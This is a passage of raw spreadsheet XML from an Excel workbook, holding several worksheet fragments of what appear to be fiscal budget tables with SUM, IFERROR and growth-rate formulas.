  </sheetPr>
  <dimension ref="A1:D11"/>
  <sheetViews>
    <sheetView showZeros="0" workbookViewId="0">
      <pane xSplit="2" ySplit="4" topLeftCell="C5" activePane="bottomRight" state="frozen"/>
      <selection/>
      <selection pane="topRight"/>
      <selection pane="bottomLeft"/>
      <selection pane="bottomRight" activeCell="C14" sqref="C14"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="10.1481481481481" defaultRowHeight="15.6" outlineLevelCol="3"/>
  <cols>
    <col min="1" max="1" width="37.7777777777778" style="351" customWidth="1"/>
    <col min="2" max="2" width="20.7222222222222" style="352" customWidth="1"/>
    <col min="3" max="3" width="20.7222222222222" style="353" customWidth="1"/>
    <col min="4" max="4" width="20.7222222222222" style="354" customWidth="1"/>
    <col min="5" max="5" width="12.8425925925926" style="351" customWidth="1"/>
    <col min="6" max="16384" width="10.1481481481481" style="351"/>
  </cols>
  <sheetData>
    <row r="1" s="347" customFormat="1" ht="21.75" customHeight="1" spans="1:4">
      <c r="A1" s="334" t="s">
        <v>2183</v>
      </c>
      <c r="B1" s="355"/>
      <c r="C1" s="355"/>
      <c r="D1" s="356"/>
    </row>
    <row r="2" s="348" customFormat="1" ht="30" customHeight="1" spans="1:4">
      <c r="A2" s="357" t="s">
        <v>2184</v>
      </c>
      <c r="B2" s="357"/>
      <c r="C2" s="357"/>
      <c r="D2" s="357"/>
    </row>
    <row r="3" s="349" customFormat="1" ht="20.25" customHeight="1" spans="1:4">
      <c r="A3" s="358"/>
      <c r="B3" s="358"/>
      <c r="C3" s="358"/>
      <c r="D3" s="359" t="s">
        <v>373</v>
      </c>
    </row>
    <row r="4" s="350" customFormat="1" ht="30.95" customHeight="1" spans="1:4">
      <c r="A4" s="360" t="s">
        <v>931</v>
      </c>
      <c r="B4" s="361" t="s">
        <v>519</v>
      </c>
      <c r="C4" s="361" t="s">
        <v>829</v>
      </c>
      <c r="D4" s="361" t="s">
        <v>619</v>
      </c>
    </row>
    <row r="5" ht="24" customHeight="1" spans="1:4">
      <c r="A5" s="360"/>
      <c r="B5" s="361"/>
      <c r="C5" s="361"/>
      <c r="D5" s="361"/>
    </row>
    <row r="6" ht="24" customHeight="1" spans="1:4">
      <c r="A6" s="362" t="s">
        <v>627</v>
      </c>
      <c r="B6" s="363">
        <v>59396</v>
      </c>
      <c r="C6" s="363">
        <v>62625</v>
      </c>
      <c r="D6" s="364">
        <f t="shared" ref="D6:D11" si="0">(C6-B6)/B6*100</f>
        <v>5.4363930230992</v>
      </c>
    </row>
    <row r="7" ht="24" customHeight="1" spans="1:4">
      <c r="A7" s="365" t="s">
        <v>934</v>
      </c>
      <c r="B7" s="366">
        <v>57493</v>
      </c>
      <c r="C7" s="366">
        <v>61025</v>
      </c>
      <c r="D7" s="367">
        <f t="shared" si="0"/>
        <v>6.14335658254048</v>
      </c>
    </row>
    <row r="8" ht="24" customHeight="1" spans="1:4">
      <c r="A8" s="365" t="s">
        <v>629</v>
      </c>
      <c r="B8" s="366">
        <v>40897</v>
      </c>
      <c r="C8" s="366">
        <v>46937</v>
      </c>
      <c r="D8" s="367">
        <f t="shared" si="0"/>
        <v>14.7688094481258</v>
      </c>
    </row>
    <row r="9" ht="24" customHeight="1" spans="1:4">
      <c r="A9" s="365" t="s">
        <v>935</v>
      </c>
      <c r="B9" s="366">
        <v>40857</v>
      </c>
      <c r="C9" s="366">
        <v>46896</v>
      </c>
      <c r="D9" s="367">
        <f t="shared" si="0"/>
        <v>14.7808209119612</v>
      </c>
    </row>
    <row r="10" ht="24" customHeight="1" spans="1:4">
      <c r="A10" s="365" t="s">
        <v>631</v>
      </c>
      <c r="B10" s="368">
        <v>100293</v>
      </c>
      <c r="C10" s="368">
        <v>109562</v>
      </c>
      <c r="D10" s="369">
        <f t="shared" si="0"/>
        <v>9.24192117096906</v>
      </c>
    </row>
    <row r="11" ht="24" customHeight="1" spans="1:4">
      <c r="A11" s="370" t="s">
        <v>936</v>
      </c>
      <c r="B11" s="371">
        <v>98350</v>
      </c>
      <c r="C11" s="371">
        <v>107921</v>
      </c>
      <c r="D11" s="372">
        <f t="shared" si="0"/>
        <v>9.73157092018302</v>
      </c>
    </row>
  </sheetData>
  <mergeCells count="5">
    <mergeCell ref="A2:D2"/>
    <mergeCell ref="A4:A5"/>
    <mergeCell ref="B4:B5"/>
    <mergeCell ref="C4:C5"/>
    <mergeCell ref="D4:D5"/>
  </mergeCells>
  <printOptions horizontalCentered="1"/>
  <pageMargins left="0.590277777777778" right="0.590277777777778" top="0.790972222222222" bottom="0.790972222222222" header="0.310416666666667" footer="0.310416666666667"/>
  <pageSetup paperSize="9" fitToHeight="0" orientation="portrait" useFirstPageNumber="1" errors="NA"/>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6"/>
  </sheetPr>
  <dimension ref="A1:I42"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <pane xSplit="1" ySplit="7" topLeftCell="B23" activePane="bottomRight" state="frozen"/>
      <selection/>
      <selection pane="topRight"/>
      <selection pane="bottomLeft"/>
      <selection pane="bottomRight" activeCell="I7" sqref="I7:I20"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="10.2777777777778" defaultRowHeight="15.6"/>
  <cols>
    <col min="1" max="1" width="33.6388888888889" style="968" customWidth="1"/>
    <col min="2" max="2" width="10.5740740740741" style="968" customWidth="1"/>
    <col min="3" max="5" width="13.5740740740741" style="968" customWidth="1"/>
    <col min="6" max="16384" width="10.2777777777778" style="968"/>
  </cols>
  <sheetData>
    <row r="1" ht="18" spans="1:1">
      <c r="A1" s="1157" t="s">
        <v>372</v>
      </c>
    </row>
    <row r="2" ht="25.5" customHeight="1" spans="1:6">
      <c r="A2" s="998" t="s">
        <v>210</v>
      </c>
      <c r="B2" s="998"/>
      <c r="C2" s="998"/>
      <c r="D2" s="998"/>
      <c r="E2" s="998"/>
      <c r="F2" s="998"/>
    </row>
    <row r="3" spans="1:6">
      <c r="A3" s="1081"/>
      <c r="B3" s="1081"/>
      <c r="C3" s="1081"/>
      <c r="D3" s="1081"/>
      <c r="E3" s="1081"/>
      <c r="F3" s="1167" t="s">
        <v>373</v>
      </c>
    </row>
    <row r="4" s="694" customFormat="1" ht="24" customHeight="1" spans="1:6">
      <c r="A4" s="972" t="s">
        <v>374</v>
      </c>
      <c r="B4" s="972" t="s">
        <v>375</v>
      </c>
      <c r="C4" s="972" t="s">
        <v>376</v>
      </c>
      <c r="D4" s="972" t="s">
        <v>377</v>
      </c>
      <c r="E4" s="972"/>
      <c r="F4" s="972"/>
    </row>
    <row r="5" s="694" customFormat="1" ht="32" customHeight="1" spans="1:6">
      <c r="A5" s="1061"/>
      <c r="B5" s="972"/>
      <c r="C5" s="972"/>
      <c r="D5" s="972" t="s">
        <v>378</v>
      </c>
      <c r="E5" s="972" t="s">
        <v>379</v>
      </c>
      <c r="F5" s="972" t="s">
        <v>380</v>
      </c>
    </row>
    <row r="6" ht="18" customHeight="1" spans="1:6">
      <c r="A6" s="774" t="s">
        <v>381</v>
      </c>
      <c r="B6" s="1022">
        <f>SUM(B7:B21)</f>
        <v>129988</v>
      </c>
      <c r="C6" s="1022">
        <f>SUM(C7:C21)</f>
        <v>131000</v>
      </c>
      <c r="D6" s="1022">
        <f>SUM(D7:D21)</f>
        <v>131310</v>
      </c>
      <c r="E6" s="1168">
        <f t="shared" ref="E6:E26" si="0">IFERROR(D6/C6*100,"-")</f>
        <v>100.236641221374</v>
      </c>
      <c r="F6" s="777">
        <f t="shared" ref="F6:F21" si="1">IFERROR((D6-B6)/B6*100,"-")</f>
        <v>1.01701695541127</v>
      </c>
    </row>
    <row r="7" ht="18" customHeight="1" spans="1:9">
      <c r="A7" s="774" t="s">
        <v>382</v>
      </c>
      <c r="B7" s="1022">
        <v>53810</v>
      </c>
      <c r="C7" s="1022">
        <v>59178</v>
      </c>
      <c r="D7" s="1022">
        <v>59008</v>
      </c>
      <c r="E7" s="1168">
        <f t="shared" si="0"/>
        <v>99.7127310824969</v>
      </c>
      <c r="F7" s="777">
        <f t="shared" si="1"/>
        <v>9.65991451403085</v>
      </c>
      <c r="H7" s="968">
        <v>21825</v>
      </c>
      <c r="I7" s="968">
        <f>B7-H7</f>
        <v>31985</v>
      </c>
    </row>
    <row r="8" ht="18" customHeight="1" spans="1:9">
      <c r="A8" s="774" t="s">
        <v>383</v>
      </c>
      <c r="B8" s="1022">
        <v>26878</v>
      </c>
      <c r="C8" s="1022">
        <v>23725</v>
      </c>
      <c r="D8" s="1022">
        <v>23727</v>
      </c>
      <c r="E8" s="1168">
        <f t="shared" si="0"/>
        <v>100.008429926238</v>
      </c>
      <c r="F8" s="777">
        <f t="shared" si="1"/>
        <v>-11.7233425106035</v>
      </c>
      <c r="H8" s="968">
        <v>8867</v>
      </c>
      <c r="I8" s="968">
        <f t="shared" ref="I8:I20" si="2">B8-H8</f>
        <v>18011</v>
      </c>
    </row>
    <row r="9" ht="18" customHeight="1" spans="1:9">
      <c r="A9" s="774" t="s">
        <v>384</v>
      </c>
      <c r="B9" s="1022">
        <v>10834</v>
      </c>
      <c r="C9" s="1022">
        <v>6688</v>
      </c>
      <c r="D9" s="1022">
        <v>6694</v>
      </c>
      <c r="E9" s="1168">
        <f t="shared" si="0"/>
        <v>100.08971291866</v>
      </c>
      <c r="F9" s="777">
        <f t="shared" si="1"/>
        <v>-38.2130330441204</v>
      </c>
      <c r="H9" s="968">
        <v>1567</v>
      </c>
      <c r="I9" s="968">
        <f t="shared" si="2"/>
        <v>9267</v>
      </c>
    </row>
    <row r="10" ht="18" customHeight="1" spans="1:9">
      <c r="A10" s="774" t="s">
        <v>385</v>
      </c>
      <c r="B10" s="1022">
        <v>4362</v>
      </c>
      <c r="C10" s="1022">
        <v>4371</v>
      </c>
      <c r="D10" s="1022">
        <v>4371</v>
      </c>
      <c r="E10" s="1168">
        <f t="shared" si="0"/>
        <v>100</v>
      </c>
      <c r="F10" s="777">
        <f t="shared" si="1"/>
        <v>0.206327372764787</v>
      </c>
      <c r="H10" s="968">
        <v>2978</v>
      </c>
      <c r="I10" s="968">
        <f t="shared" si="2"/>
        <v>1384</v>
      </c>
    </row>
    <row r="11" ht="18" customHeight="1" spans="1:9">
      <c r="A11" s="774" t="s">
        <v>386</v>
      </c>
      <c r="B11" s="1022">
        <v>5491</v>
      </c>
      <c r="C11" s="1022">
        <v>5593</v>
      </c>
      <c r="D11" s="1022">
        <v>5595</v>
      </c>
      <c r="E11" s="1168">
        <f t="shared" si="0"/>
        <v>100.035758984445</v>
      </c>
      <c r="F11" s="777">
        <f t="shared" si="1"/>
        <v>1.89400837734475</v>
      </c>
      <c r="H11" s="968">
        <v>2069</v>
      </c>
      <c r="I11" s="968">
        <f t="shared" si="2"/>
        <v>3422</v>
      </c>
    </row>
    <row r="12" ht="18" customHeight="1" spans="1:9">
      <c r="A12" s="774" t="s">
        <v>387</v>
      </c>
      <c r="B12" s="1022">
        <v>10092</v>
      </c>
      <c r="C12" s="1022">
        <v>12106</v>
      </c>
      <c r="D12" s="1022">
        <v>12178</v>
      </c>
      <c r="E12" s="1168">
        <f t="shared" si="0"/>
        <v>100.59474640674</v>
      </c>
      <c r="F12" s="777">
        <f t="shared" si="1"/>
        <v>20.6698374950456</v>
      </c>
      <c r="H12" s="968">
        <v>2054</v>
      </c>
      <c r="I12" s="968">
        <f t="shared" si="2"/>
        <v>8038</v>
      </c>
    </row>
    <row r="13" ht="18" customHeight="1" spans="1:9">
      <c r="A13" s="774" t="s">
        <v>388</v>
      </c>
      <c r="B13" s="1022">
        <v>2585</v>
      </c>
      <c r="C13" s="1022">
        <v>2092</v>
      </c>
      <c r="D13" s="1022">
        <v>2095</v>
      </c>
      <c r="E13" s="1168">
        <f t="shared" si="0"/>
        <v>100.143403441683</v>
      </c>
      <c r="F13" s="777">
        <f t="shared" si="1"/>
        <v>-18.9555125725338</v>
      </c>
      <c r="H13" s="968">
        <v>667</v>
      </c>
      <c r="I13" s="968">
        <f t="shared" si="2"/>
        <v>1918</v>
      </c>
    </row>
    <row r="14" ht="18" customHeight="1" spans="1:9">
      <c r="A14" s="774" t="s">
        <v>389</v>
      </c>
      <c r="B14" s="1022">
        <v>4393</v>
      </c>
      <c r="C14" s="1022">
        <v>5387</v>
      </c>
      <c r="D14" s="1022">
        <v>5414</v>
      </c>
      <c r="E14" s="1168">
        <f t="shared" si="0"/>
        <v>100.501206608502</v>
      </c>
      <c r="F14" s="777">
        <f t="shared" si="1"/>
        <v>23.2415206009561</v>
      </c>
      <c r="H14" s="968">
        <v>1441</v>
      </c>
      <c r="I14" s="968">
        <f t="shared" si="2"/>
        <v>2952</v>
      </c>
    </row>
    <row r="15" ht="18" customHeight="1" spans="1:9">
      <c r="A15" s="774" t="s">
        <v>390</v>
      </c>
      <c r="B15" s="1022">
        <v>1382</v>
      </c>
      <c r="C15" s="1022">
        <v>-2285</v>
      </c>
      <c r="D15" s="1022">
        <v>-2285</v>
      </c>
      <c r="E15" s="1168">
        <f t="shared" si="0"/>
        <v>100</v>
      </c>
      <c r="F15" s="777">
        <f t="shared" si="1"/>
        <v>-265.34008683068</v>
      </c>
      <c r="H15" s="968">
        <v>328</v>
      </c>
      <c r="I15" s="968">
        <f t="shared" si="2"/>
        <v>1054</v>
      </c>
    </row>
    <row r="16" ht="18" customHeight="1" spans="1:9">
      <c r="A16" s="774" t="s">
        <v>391</v>
      </c>
      <c r="B16" s="1022">
        <v>2214</v>
      </c>
      <c r="C16" s="1022">
        <v>2320</v>
      </c>
      <c r="D16" s="1022">
        <v>2320</v>
      </c>
      <c r="E16" s="1168">
        <f t="shared" si="0"/>
        <v>100</v>
      </c>
      <c r="F16" s="777">
        <f t="shared" si="1"/>
        <v>4.7877145438121</v>
      </c>
      <c r="H16" s="968">
        <v>304</v>
      </c>
      <c r="I16" s="968">
        <f t="shared" si="2"/>
        <v>1910</v>
      </c>
    </row>
    <row r="17" ht="18" customHeight="1" spans="1:9">
      <c r="A17" s="774" t="s">
        <v>392</v>
      </c>
      <c r="B17" s="1022">
        <v>952</v>
      </c>
      <c r="C17" s="1022">
        <v>2991</v>
      </c>
      <c r="D17" s="1022">
        <v>2991</v>
      </c>
      <c r="E17" s="1168">
        <f t="shared" si="0"/>
        <v>100</v>
      </c>
      <c r="F17" s="777">
        <f t="shared" si="1"/>
        <v>214.180672268908</v>
      </c>
      <c r="I17" s="968">
        <f t="shared" si="2"/>
        <v>952</v>
      </c>
    </row>
    <row r="18" ht="18" customHeight="1" spans="1:9">
      <c r="A18" s="774" t="s">
        <v>393</v>
      </c>
      <c r="B18" s="1022">
        <v>6028</v>
      </c>
      <c r="C18" s="1022">
        <v>8141</v>
      </c>
      <c r="D18" s="1022">
        <v>8509</v>
      </c>
      <c r="E18" s="1168">
        <f t="shared" si="0"/>
        <v>104.520329197887</v>
      </c>
      <c r="F18" s="777">
        <f t="shared" si="1"/>
        <v>41.1579296615793</v>
      </c>
      <c r="I18" s="968">
        <f t="shared" si="2"/>
        <v>6028</v>
      </c>
    </row>
    <row r="19" ht="18" customHeight="1" spans="1:9">
      <c r="A19" s="774" t="s">
        <v>394</v>
      </c>
      <c r="B19" s="1022">
        <v>599</v>
      </c>
      <c r="C19" s="1022">
        <v>385</v>
      </c>
      <c r="D19" s="1022">
        <v>385</v>
      </c>
      <c r="E19" s="1168">
        <f t="shared" si="0"/>
        <v>100</v>
      </c>
      <c r="F19" s="777">
        <f t="shared" si="1"/>
        <v>-35.7262103505843</v>
      </c>
      <c r="H19" s="968">
        <v>593</v>
      </c>
      <c r="I19" s="968">
        <f t="shared" si="2"/>
        <v>6</v>
      </c>
    </row>
    <row r="20" ht="18" customHeight="1" spans="1:9">
      <c r="A20" s="774" t="s">
        <v>395</v>
      </c>
      <c r="B20" s="1022">
        <v>367</v>
      </c>
      <c r="C20" s="1022">
        <v>308</v>
      </c>
      <c r="D20" s="1022">
        <v>308</v>
      </c>
      <c r="E20" s="1168">
        <f t="shared" si="0"/>
        <v>100</v>
      </c>
      <c r="F20" s="777">
        <f t="shared" si="1"/>
        <v>-16.0762942779292</v>
      </c>
      <c r="H20" s="968">
        <v>39</v>
      </c>
      <c r="I20" s="968">
        <f t="shared" si="2"/>
        <v>328</v>
      </c>
    </row>
    <row r="21" ht="18" customHeight="1" spans="1:6">
      <c r="A21" s="774" t="s">
        <v>396</v>
      </c>
      <c r="B21" s="1022">
        <v>1</v>
      </c>
      <c r="C21" s="1022"/>
      <c r="D21" s="1022"/>
      <c r="E21" s="1168"/>
      <c r="F21" s="777">
        <f t="shared" ref="F21:F26" si="3">IFERROR((D21-B21)/B21*100,"-")</f>
        <v>-100</v>
      </c>
    </row>
    <row r="22" ht="18" customHeight="1" spans="1:6">
      <c r="A22" s="774" t="s">
        <v>397</v>
      </c>
      <c r="B22" s="1022">
        <f>SUM(B23:B29)</f>
        <v>118400</v>
      </c>
      <c r="C22" s="1022">
        <f>SUM(C23:C29)</f>
        <v>124900</v>
      </c>
      <c r="D22" s="1022">
        <f>SUM(D23:D29)</f>
        <v>124761</v>
      </c>
      <c r="E22" s="1168">
        <f t="shared" ref="E21:E26" si="4">IFERROR(D22/C22*100,"-")</f>
        <v>99.888710968775</v>
      </c>
      <c r="F22" s="777">
        <f t="shared" si="3"/>
        <v>5.37246621621622</v>
      </c>
    </row>
    <row r="23" ht="18" customHeight="1" spans="1:6">
      <c r="A23" s="774" t="s">
        <v>398</v>
      </c>
      <c r="B23" s="1022">
        <v>5952</v>
      </c>
      <c r="C23" s="1022">
        <v>6244</v>
      </c>
      <c r="D23" s="1022">
        <v>6254</v>
      </c>
      <c r="E23" s="1168">
        <f t="shared" si="4"/>
        <v>100.160153747598</v>
      </c>
      <c r="F23" s="777">
        <f t="shared" si="3"/>
        <v>5.0739247311828</v>
      </c>
    </row>
    <row r="24" ht="18" customHeight="1" spans="1:6">
      <c r="A24" s="774" t="s">
        <v>399</v>
      </c>
      <c r="B24" s="1022">
        <v>5183</v>
      </c>
      <c r="C24" s="1022">
        <v>6400</v>
      </c>
      <c r="D24" s="1022">
        <v>6400</v>
      </c>
      <c r="E24" s="1168">
        <f t="shared" si="4"/>
        <v>100</v>
      </c>
      <c r="F24" s="777">
        <f t="shared" si="3"/>
        <v>23.4806096855103</v>
      </c>
    </row>
    <row r="25" ht="18" customHeight="1" spans="1:6">
      <c r="A25" s="774" t="s">
        <v>400</v>
      </c>
      <c r="B25" s="1022">
        <v>15357</v>
      </c>
      <c r="C25" s="1022">
        <v>12540</v>
      </c>
      <c r="D25" s="1022">
        <v>12690</v>
      </c>
      <c r="E25" s="1168">
        <f t="shared" si="4"/>
        <v>101.196172248804</v>
      </c>
      <c r="F25" s="777">
        <f t="shared" si="3"/>
        <v>-17.3666731783551</v>
      </c>
    </row>
    <row r="26" ht="18" customHeight="1" spans="1:6">
      <c r="A26" s="774" t="s">
        <v>401</v>
      </c>
      <c r="B26" s="1022"/>
      <c r="C26" s="1022"/>
      <c r="D26" s="1022"/>
      <c r="E26" s="1168"/>
      <c r="F26" s="777"/>
    </row>
    <row r="27" ht="18" customHeight="1" spans="1:6">
      <c r="A27" s="774" t="s">
        <v>402</v>
      </c>
      <c r="B27" s="1022">
        <v>91389</v>
      </c>
      <c r="C27" s="1022">
        <v>99183</v>
      </c>
      <c r="D27" s="1022">
        <v>98884</v>
      </c>
      <c r="E27" s="1168">
        <f>IFERROR(D27/C27*100,"-")</f>
        <v>99.6985370476796</v>
      </c>
      <c r="F27" s="777">
        <f t="shared" ref="F27:F39" si="5">IFERROR((D27-B27)/B27*100,"-")</f>
        <v>8.2012058344002</v>
      </c>
    </row>
    <row r="28" ht="18" customHeight="1" spans="1:6">
      <c r="A28" s="774" t="s">
        <v>403</v>
      </c>
      <c r="B28" s="1022"/>
      <c r="C28" s="1022">
        <v>109</v>
      </c>
      <c r="D28" s="1022">
        <v>109</v>
      </c>
      <c r="E28" s="1168">
        <f>IFERROR(D28/C28*100,"-")</f>
        <v>100</v>
      </c>
      <c r="F28" s="777"/>
    </row>
    <row r="29" ht="18" customHeight="1" spans="1:6">
      <c r="A29" s="774" t="s">
        <v>404</v>
      </c>
      <c r="B29" s="1022">
        <v>519</v>
      </c>
      <c r="C29" s="1022">
        <v>424</v>
      </c>
      <c r="D29" s="1022">
        <v>424</v>
      </c>
      <c r="E29" s="1168">
        <f t="shared" ref="E29:E31" si="6">IFERROR(D29/C29*100,"-")</f>
        <v>100</v>
      </c>
      <c r="F29" s="777">
        <f t="shared" si="5"/>
        <v>-18.3044315992293</v>
      </c>
    </row>
    <row r="30" ht="18" customHeight="1" spans="1:6">
      <c r="A30" s="1083" t="s">
        <v>405</v>
      </c>
      <c r="B30" s="1084">
        <f>B6+B22</f>
        <v>248388</v>
      </c>
      <c r="C30" s="1067">
        <f>SUM(C6,C22)</f>
        <v>255900</v>
      </c>
      <c r="D30" s="1068">
        <f>SUM(D6,D22)</f>
        <v>256071</v>
      </c>
      <c r="E30" s="1169">
        <f t="shared" si="6"/>
        <v>100.066822977726</v>
      </c>
      <c r="F30" s="1086">
        <f t="shared" si="5"/>
        <v>3.09314459635731</v>
      </c>
    </row>
    <row r="31" ht="18" customHeight="1" spans="1:6">
      <c r="A31" s="774" t="s">
        <v>406</v>
      </c>
      <c r="B31" s="775">
        <f>SUM(B32:B33)</f>
        <v>21080</v>
      </c>
      <c r="C31" s="1022">
        <f>SUM(C32:C33)</f>
        <v>7140</v>
      </c>
      <c r="D31" s="1071">
        <f>SUM(D32:D33)</f>
        <v>7140</v>
      </c>
      <c r="E31" s="1168">
        <f t="shared" si="6"/>
        <v>100</v>
      </c>
      <c r="F31" s="777">
        <f t="shared" si="5"/>
        <v>-66.1290322580645</v>
      </c>
    </row>
    <row r="32" ht="18" customHeight="1" spans="1:6">
      <c r="A32" s="774" t="s">
        <v>407</v>
      </c>
      <c r="B32" s="775"/>
      <c r="C32" s="1022"/>
      <c r="D32" s="1071"/>
      <c r="E32" s="1168"/>
      <c r="F32" s="777"/>
    </row>
    <row r="33" ht="18" customHeight="1" spans="1:6">
      <c r="A33" s="774" t="s">
        <v>408</v>
      </c>
      <c r="B33" s="775">
        <v>21080</v>
      </c>
      <c r="C33" s="1022">
        <v>7140</v>
      </c>
      <c r="D33" s="1071">
        <v>7140</v>
      </c>
      <c r="E33" s="1168">
        <f>IFERROR(D33/C33*100,"-")</f>
        <v>100</v>
      </c>
      <c r="F33" s="777">
        <f t="shared" si="5"/>
        <v>-66.1290322580645</v>
      </c>
    </row>
    <row r="34" ht="18" customHeight="1" spans="1:6">
      <c r="A34" s="774" t="s">
        <v>409</v>
      </c>
      <c r="B34" s="775">
        <f>SUM(B35:B41)</f>
        <v>310209</v>
      </c>
      <c r="C34" s="775">
        <f>SUM(C35:C41)</f>
        <v>296902</v>
      </c>
      <c r="D34" s="775">
        <f>SUM(D35:D41)</f>
        <v>292369</v>
      </c>
      <c r="E34" s="1168">
        <f>IFERROR(D34/C34*100,"-")</f>
        <v>98.4732335922291</v>
      </c>
      <c r="F34" s="777">
        <f t="shared" si="5"/>
        <v>-5.75096144857177</v>
      </c>
    </row>
    <row r="35" ht="18" customHeight="1" spans="1:6">
      <c r="A35" s="774" t="s">
        <v>410</v>
      </c>
      <c r="B35" s="775">
        <v>12077</v>
      </c>
      <c r="C35" s="1022">
        <v>12077</v>
      </c>
      <c r="D35" s="1071">
        <v>12077</v>
      </c>
      <c r="E35" s="1168">
        <f t="shared" ref="E35:E41" si="7">IFERROR(D35/C35*100,"-")</f>
        <v>100</v>
      </c>
      <c r="F35" s="777">
        <f t="shared" ref="F35:F41" si="8">IFERROR((D35-B35)/B35*100,"-")</f>
        <v>0</v>
      </c>
    </row>
    <row r="36" ht="18" customHeight="1" spans="1:6">
      <c r="A36" s="774" t="s">
        <v>411</v>
      </c>
      <c r="B36" s="110">
        <v>166691</v>
      </c>
      <c r="C36" s="1022">
        <v>176217</v>
      </c>
      <c r="D36" s="1071">
        <v>181087</v>
      </c>
      <c r="E36" s="1168">
        <f t="shared" si="7"/>
        <v>102.763638014493</v>
      </c>
      <c r="F36" s="777">
        <f t="shared" si="8"/>
        <v>8.6363390944922</v>
      </c>
    </row>
    <row r="37" ht="18" customHeight="1" spans="1:6">
      <c r="A37" s="774" t="s">
        <v>412</v>
      </c>
      <c r="B37" s="775">
        <v>23722</v>
      </c>
      <c r="C37" s="1022">
        <v>33052</v>
      </c>
      <c r="D37" s="1071">
        <v>35115</v>
      </c>
      <c r="E37" s="1168">
        <f t="shared" si="7"/>
        <v>106.241679777321</v>
      </c>
      <c r="F37" s="777">
        <f t="shared" si="8"/>
        <v>48.0271477952955</v>
      </c>
    </row>
    <row r="38" ht="18" customHeight="1" spans="1:6">
      <c r="A38" s="774" t="s">
        <v>413</v>
      </c>
      <c r="B38" s="775">
        <v>424</v>
      </c>
      <c r="C38" s="1022">
        <v>5489</v>
      </c>
      <c r="D38" s="1071">
        <v>5489</v>
      </c>
      <c r="E38" s="1168">
        <f t="shared" si="7"/>
        <v>100</v>
      </c>
      <c r="F38" s="777">
        <f t="shared" si="8"/>
        <v>1194.57547169811</v>
      </c>
    </row>
    <row r="39" ht="18" customHeight="1" spans="1:6">
      <c r="A39" s="774" t="s">
        <v>414</v>
      </c>
      <c r="B39" s="775"/>
      <c r="C39" s="1022"/>
      <c r="D39" s="1071"/>
      <c r="E39" s="1168"/>
      <c r="F39" s="777"/>
    </row>
    <row r="40" ht="18" customHeight="1" spans="1:6">
      <c r="A40" s="774" t="s">
        <v>415</v>
      </c>
      <c r="B40" s="775">
        <v>90907</v>
      </c>
      <c r="C40" s="1022">
        <v>62033</v>
      </c>
      <c r="D40" s="1071">
        <v>50567</v>
      </c>
      <c r="E40" s="1168">
        <f t="shared" si="7"/>
        <v>81.5162897167637</v>
      </c>
      <c r="F40" s="777">
        <f t="shared" si="8"/>
        <v>-44.3750206254744</v>
      </c>
    </row>
    <row r="41" ht="18" customHeight="1" spans="1:6">
      <c r="A41" s="774" t="s">
        <v>416</v>
      </c>
      <c r="B41" s="775">
        <v>16388</v>
      </c>
      <c r="C41" s="1022">
        <v>8034</v>
      </c>
      <c r="D41" s="1071">
        <v>8034</v>
      </c>
      <c r="E41" s="1168">
        <f t="shared" si="7"/>
        <v>100</v>
      </c>
      <c r="F41" s="777">
        <f t="shared" si="8"/>
        <v>-50.9763241396143</v>
      </c>
    </row>
    <row r="42" ht="18" customHeight="1" spans="1:6">
      <c r="A42" s="780" t="s">
        <v>417</v>
      </c>
      <c r="B42" s="781">
        <f>B30+B31+B34</f>
        <v>579677</v>
      </c>
      <c r="C42" s="780">
        <f>SUM(C30,C31,C34)</f>
        <v>559942</v>
      </c>
      <c r="D42" s="780">
        <f>SUM(D30,D31,D34)</f>
        <v>555580</v>
      </c>
      <c r="E42" s="1170">
        <f t="shared" ref="E40:E42" si="9">IFERROR(D42/C42*100,"-")</f>
        <v>99.2209907454701</v>
      </c>
      <c r="F42" s="782">
        <f t="shared" ref="F40:F42" si="10">IFERROR((D42-B42)/B42*100,"-")</f>
        <v>-4.15697017476974</v>
      </c>
    </row>
  </sheetData>
  <mergeCells count="5">
    <mergeCell ref="A2:F2"/>
    <mergeCell ref="D4:F4"/>
    <mergeCell ref="A4:A5"/>
    <mergeCell ref="B4:B5"/>
    <mergeCell ref="C4:C5"/>
  </mergeCells>
  <printOptions horizontalCentered="1"/>
  <pageMargins left="0.314583333333333" right="0.393055555555556" top="0.629861111111111" bottom="0.748031496062992" header="0.31496062992126" footer="0.31496062992126"/>
  <pageSetup paperSize="9" orientation="portrait"/>
  <headerFooter/>
</worksheet>
</file>

<file path=xl/worksheets/sheet6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599993896298105"/>
  </sheetPr>
  <dimension ref="A1:H61"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <pane xSplit="1" ySplit="5" topLeftCell="B6" activePane="bottomRight" state="frozen"/>
      <selection/>
      <selection pane="topRight"/>
      <selection pane="bottomLeft"/>
      <selection pane="bottomRight" activeCell="B6" sqref="B6:B7"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="10" defaultRowHeight="15.6" outlineLevelCol="7"/>
  <cols>
    <col min="1" max="1" width="43" style="184" customWidth="1"/>
    <col min="2" max="2" width="34.1481481481481" style="184" customWidth="1"/>
    <col min="3" max="16384" width="10" style="184"/>
  </cols>
  <sheetData>
    <row r="1" ht="18" customHeight="1" spans="1:5">
      <c r="A1" s="334" t="s">
        <v>2185</v>
      </c>
      <c r="B1" s="335"/>
      <c r="C1" s="336"/>
      <c r="D1" s="336"/>
      <c r="E1" s="336"/>
    </row>
    <row r="2" ht="39" customHeight="1" spans="1:5">
      <c r="A2" s="337" t="s">
        <v>2186</v>
      </c>
      <c r="B2" s="337"/>
      <c r="C2" s="336"/>
      <c r="D2" s="336"/>
      <c r="E2" s="336"/>
    </row>
    <row r="3" ht="27" customHeight="1" spans="1:5">
      <c r="A3" s="336"/>
      <c r="B3" s="338" t="s">
        <v>373</v>
      </c>
      <c r="C3" s="336"/>
      <c r="D3" s="336"/>
      <c r="E3" s="336"/>
    </row>
    <row r="4" ht="42.95" customHeight="1" spans="1:5">
      <c r="A4" s="339" t="s">
        <v>931</v>
      </c>
      <c r="B4" s="340" t="s">
        <v>829</v>
      </c>
      <c r="C4" s="336"/>
      <c r="D4" s="336"/>
      <c r="E4" s="336"/>
    </row>
    <row r="5" ht="39.95" customHeight="1" spans="1:8">
      <c r="A5" s="341" t="s">
        <v>635</v>
      </c>
      <c r="B5" s="342">
        <f>B6+B7</f>
        <v>82602</v>
      </c>
      <c r="C5" s="336"/>
      <c r="D5" s="336"/>
      <c r="E5" s="336"/>
      <c r="G5" s="343" t="s">
        <v>939</v>
      </c>
